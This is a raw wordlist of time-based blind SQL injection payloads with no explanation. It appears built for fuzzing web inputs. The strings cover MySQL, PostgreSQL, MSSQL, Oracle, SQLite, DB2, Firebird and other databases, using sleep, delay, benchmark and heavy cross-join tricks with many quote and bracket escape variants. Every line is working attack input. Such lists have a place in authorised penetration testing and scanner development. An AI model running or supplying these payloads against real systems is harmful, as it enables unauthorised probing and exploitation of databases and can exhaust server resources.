-sleep(5)
-sleep(5)# -
-sleep(5)-- -
or sleep(5)# -
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
' or sleep(5)--ss
') or sleep(5)-- -
')) or sleep(5)-- -
) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'-- -
);waitfor delay '0:0:5'-- -
';waitfor delay '0:0:5'-- -
";waitfor delay '0:0:5'-- -
');waitfor delay '0:0:5'-- -
");waitfor delay '0:0:5'-- -
));waitfor delay '0:0:5'-- -
'));waitfor delay '0:0:5'-- -
"));waitfor delay '0:0:5'-- -
'||pg_sleep(10)--
'||pg_sleep(10)-- -
' ||pg_sleep(10)--
' ||pg_sleep(10)-- -
benchmark(10000000,MD5(1))#
 or benchmark(10000000,MD5(1))#
  or benchmark(10000000,MD5(1))-- -
" or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))-- -
' or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))-- -
) or benchmark(10000000,MD5(1))#
) or benchmark(10000000,MD5(1))-- -
") or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))-- -
') or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))-- -
)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))-- -
')) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))-- -
' pg_sleep(5)-- -
" pg_sleep(5)-- -
') pg_sleep(5)-- -
')) pg_sleep(5)# -
')) pg_sleep(5)-- -
") pg_sleep(5)# -
 or pg_sleep(5)--
  or pg_sleep(5)# xx
" or pg_sleep(5)--
" or pg_sleep(5)#
' or pg_sleep(5)--
' or pg_sleep(5)# --
) or pg_sleep(5)--
) or pg_sleep(5)# --
") or pg_sleep(5)--
") or pg_sleep(5)#--
') or pg_sleep(5)--
') or pg_sleep(5)#
)) or pg_sleep(5)--
")) or pg_sleep(5)--
")) or pg_sleep(5)# --
')) or pg_sleep(5)--
')) or pg_sleep(5)# --
' AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- eer
" AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- xxv
' XOR(if(now()=sysdate(),sleep(5*5),0))OR-- -
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
' XOR(if(now()=sysdate(),sleep(5*5*0),0))OR '
' XOR(if(now()=sysdate(),sleep(5*5),0))OR '
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
' (select*from(select(sleep(7*7)))a) '
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
' SLEEP(5)--
" SLEEP(5)="
' SLEEP(5)='
or SLEEP(5)
' or SLEEP(5)-- tt
" or SLEEP(5)--
" or SLEEP(5)="
' or SLEEP(5)='
' AND waitfor delay '00:00:05'-- -d
" AND waitfor delay "00:00:05"-- -
' AND waitfor delay '00:00:05
' AND waitfor delay '00:00:05'# dd
AND benchmark(50000000,MD5(1))
' AND benchmark(50000000,MD5(1))-- ddd
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))-- vv
' or benchmark(50000000,MD5(1))--
" or benchmark(50000000,MD5(1))# -
-pg_SLEEP(5)
AND pg_SLEEP(5)-- c
' AND pg_SLEEP(5)-- c
" AND pg_SLEEP(5)-- c
OR pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
\''
\'
\
' AND SLEEP(5)-- -
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AND SLEEP(5) AND '1
' && SLEEP(5) && '1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
' AND (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- -
" AND (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- -
' AND (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- xx
' OR (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
'+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
' OR RANDOMBLOB(500000000/2)-- -
' AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- jfdfk
" AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- -
' OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- jurewr
" OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- jurewr
' AND RANDOMBLOB(1000000000/2)-- -
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
 waitfor delay '0:0:5' /* 
 waitfor delay '0:0:5' --
' waitfor delay '0:0:5' /* 
' waitfor delay '0:0:5' -- csc
" waitfor delay '0:0:5' /* 
" waitfor delay '0:0:5' -- fdf
) waitfor delay '0:0:5' /* 
) waitfor delay '0:0:5' -- fdf
)) waitfor delay '0:0:5' /* 
)) waitfor delay '0:0:5' -- fdf
))) waitfor delay '0:0:5' /* 
))) waitfor delay '0:0:5' -- dfd
)))) waitfor delay '0:0:5' /* 
)))) waitfor delay '0:0:5' -- r
))))) waitfor delay '0:0:5' -- oxxx
)))))) waitfor delay '0:0:5'-- fff
') waitfor delay '0:0:5' /* 
') waitfor delay '0:0:5' --
") waitfor delay '0:0:5' /* 
") waitfor delay '0:0:5' --
')) waitfor delay '0:0:5' /*
')) waitfor delay '0:0:5' --
")) waitfor delay '0:0:5' /* 
")) waitfor delay '0:0:5' --
'))) waitfor delay '0:0:5' /* 
'))) waitfor delay '0:0:5' --
"))) waitfor delay '0:0:5' /* 
"))) waitfor delay '0:0:5' --
')))) waitfor delay '0:0:5' /* 
')))) waitfor delay '0:0:5' --
")))) waitfor delay '0:0:5' /* 
")))) waitfor delay '0:0:5' --
'))))) waitfor delay '0:0:5' /* 
'))))) waitfor delay '0:0:5' --
"))))) waitfor delay '0:0:5' /* 
"))))) waitfor delay '0:0:5' --
')))))) waitfor delay '0:0:5' /* 
')))))) waitfor delay '0:0:5' --
")))))) waitfor delay '0:0:5' /* 
")))))) waitfor delay '0:0:5' --
AND (SELECT 5 FROM (SELECT(SLEEP(6)))xxqwx)-- -
OR (SELECT 5 FROM (SELECT(SLEEP(6)))xxqwx)-- -
AND SLEEP(6)-- xvfdf
' OR SLEEP(6)# fdfdf
" OR SLEEP(6)# fdfdf
AND SLEEP(6)
OR SLEEP(6)
' AND (SELECT 5 FROM (SELECT(SLEEP(6)))xxqwx)-- -
' OR (SELECT 5 FROM (SELECT(SLEEP(6)))xxqwx)
' AND 5=BENCHMARK(6000000,MD5('xxqwx'))-- -
' OR 5=BENCHMARK(6000000,MD5('xxqwx'))
' AND 5=BENCHMARK(6000000,MD5('xxqwx'))-- -
" OR 5=BENCHMARK(6000000,MD5('xxqwx'))-- -
" OR RLIKE SLEEP(6)-- -
RLIKE SLEEP(6)
RLIKE (SELECT 5 FROM (SELECT(SLEEP(6)))xxqwx)
RLIKE (SELECT 5 FROM (SELECT(SLEEP(6)))xxqwx)
AND ELT(5=5,SLEEP(6))
OR ELT(5=5,SLEEP(6))
AND ELT(5=5,SLEEP(6))
OR ELT(5=5,SLEEP(6))
AND 5=(SELECT 5 FROM PG_SLEEP(6))
OR 5=(SELECT 5 FROM PG_SLEEP(6))
AND 5=(SELECT 5 FROM PG_SLEEP(6))
"); dbms_lock.sleep(5); end; --yrt
'); dbms_lock.sleep(5); end; --djs
'; dbms_lock.sleep(5); end; --a
"; dbms_lock.sleep(5); end; --a
')); dbms_lock.sleep(5); end; --a
")); dbms_lock.sleep(5); end; --a
OR 5=(SELECT 5 FROM PG_SLEEP(6))
AND 5=(SELECT COUNT(*) FROM GENERATE_SERIES(1,6000000))-- -
OR 5=(SELECT COUNT(*) FROM GENERATE_SERIES(1,6000000))
' AND 5=(SELECT COUNT(*) FROM GENERATE_SERIES(1,6000000))-- gg--
xyz' UNION SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END--
xyz' UNION SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END--
" OR 5=(SELECT COUNT(*) FROM GENERATE_SERIES(1,6000000))
'; IF (1=2) WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '0:0:10'--
' AND WAITFOR DELAY '0:0:6'-- -
WAITFOR DELAY '0:0:6'
' AND 5=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- -
' OR 5=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- -xxx
AND 5=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
OR 5=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
AND 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)
' AND 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- -
" AND 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- xxxx
' OR 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- fsd
" OR 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- -
OR 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- -
' AND 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- -d
" AND 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- -d
' OR 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- ee
" OR 5=DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6)-- eee
' AND 5=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- bb
OR 5=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
" AND 5=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- -cc
' OR 5=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- -w
' AND 5=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)-- -
' OR 5=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)-- -
" AND 5=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)-- -
" OR 5=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)--  8djhjsad
AND 5=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(600000000/2))))-- -
OR 5=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(600000000/2))))
AND 5=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(600000000/2))))
OR 5=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(600000000/2))))
AND 5=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
OR 5=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
AND 5=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
OR 5=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
AND 5=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
OR 5=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
' AND 5=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)-- -
' OR 5=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)-- a
" AND "xxqwx"=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- 345f
OR 'xxqwx'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- -wfewf
' OR 'xxqwx'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- -wfewf
AND 'xxqwx'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- fjdhfj
' AND 'xxqwx'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- fjdhfj
OR 'xxqwx'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- fiuif
' OR 'xxqwx'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- fiuif
" OR "xxqwx"=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),6000000000),NULL)-- fiuif
AND 'xxqwx'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL)-- 923ur
' AND 'xxqwx'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL)-- 923ur
" AND "xxqwx"=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL)-- 923ur
OR 'xxqwx'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL)
' AND 'xxqwx'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL)-- rje
' OR 'xxqwx'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL)-- rheu
' AND 5=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)-- j4k3
OR 5=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)-- jree3
AND 5=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
OR 5=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
PROCEDURE ANALYSE(EXTRACTVALUE(5,CONCAT('\',(BENCHMARK(6000000,MD5('xxqwx'))))),1)-- -
' PROCEDURE ANALYSE(EXTRACTVALUE(5,CONCAT('\',(BENCHMARK(6000000,MD5('xxqwx'))))),1)-- -
' AND PROCEDURE ANALYSE(EXTRACTVALUE(5,CONCAT('\',(BENCHMARK(6000000,MD5('xxqwx'))))),1)-- -
PROCEDURE ANALYSE(EXTRACTVALUE(5,CONCAT('\',(BENCHMARK(6000000,MD5('xxqwx'))))),1)
(CASE WHEN (5=5) THEN SLEEP(6) ELSE 5 END)
(SELECT 5 FROM (SELECT(SLEEP(6)))xxqwx)
(CASE WHEN (5=5) THEN (SELECT BENCHMARK(6000000,MD5('xxqwx'))) ELSE 5)
(5=5 AND SLEEP(6))
ELT(5=5,SLEEP(6))
MAKE_SET(5=5,SLEEP(6))
' AND (SELECT 5 FROM PG_SLEEP(6))-- -
' OR (SELECT COUNT(*) FROM GENERATE_SERIES(1,6000000))-- -
' AND (SELECT (CASE WHEN (5=5) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 5 END))-- dddd
" AND (SELECT (CASE WHEN (5=5) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 5 END))-- kjkew
' AND BEGIN IF (5=5) THEN DBMS_LOCK.SLEEP(6); ELSE DBMS_LOCK.SLEEP(0); END IF; END;-- uuu
' AND (SELECT (CASE WHEN (5=5) THEN DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6) ELSE 5 END) FROM DUAL)--77gd
' AND (SELECT (CASE WHEN (5=5) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 5 END) FROM DUAL)-- -ekrjke
(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(600000000/2)))))
(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
' AND (SELECT (CASE WHEN (5=5) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),600000000),NULL) ELSE 'xxqwx' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)-- -7673hh
' AND (SELECT (CASE WHEN (5=5) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL) ELSE 'xxqwx' END) FROM (VALUES(0)))
(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)-- 878rew
" AND (SELECT (CASE WHEN (5=5) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL) ELSE 'xxqwx' END) FROM (VALUES(0)))
(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)-- 878rew
,(SELECT (CASE WHEN (5=5) THEN SLEEP(6) ELSE 5 END))-- -
,(SELECT (CASE WHEN (5=5) THEN (SELECT BENCHMARK(6000000,MD5('xxqwx'))) ELSE 5*(SELECT 5 FROM mysql.db) END))
,(SELECT (CASE WHEN (5=5) THEN (SELECT 5 FROM PG_SLEEP(6)) ELSE 1/(SELECT 0) END))-- -
,(SELECT (CASE WHEN (5=5) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,6000000)) ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (5=5) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 5*(SELECT 5 UNION ALL SELECT 3422) END))-- -
,(BEGIN IF (5=5) THEN DBMS_LOCK.SLEEP(6); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
,(SELECT (CASE WHEN (5=5) THEN DBMS_PIPE.RECEIVE_MESSAGE('xxqwx',6) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (5=5) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)-- -
,(SELECT (CASE WHEN (5=5) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),600000000),NULL))) ELSE 5/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
,(SELECT (CASE WHEN (5=5) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),600000000),NULL))) ELSE 5/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test-- -
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
(select like('abcdefg',upper(hex(randomblob(150000000)))))-- -
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test-- 
benchmark(15000000,md5(0x4e446b6e))-9999
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
' AND (select 99999999 from pg_sleep(15)) as test-- -
' OR (select 99999999 from pg_sleep(15))-- -jfhjsdhfj
9999' || (select 99999999 from pg_sleep(15))||'9999
9999'||(select 99999999 from pg_sleep(15))||'9999
9999"||(select 99999999 from pg_sleep(15))||"9999
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/

99999999 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test
99999999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='99999999
99999999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="99999999
99999999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'99999999
99999999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"99999999
99999999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'99999999
99999999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"99999999
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
(select like('abcdefg',upper(hex(randomblob(150000000)))))
99999999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'99999999
99999999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"99999999
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
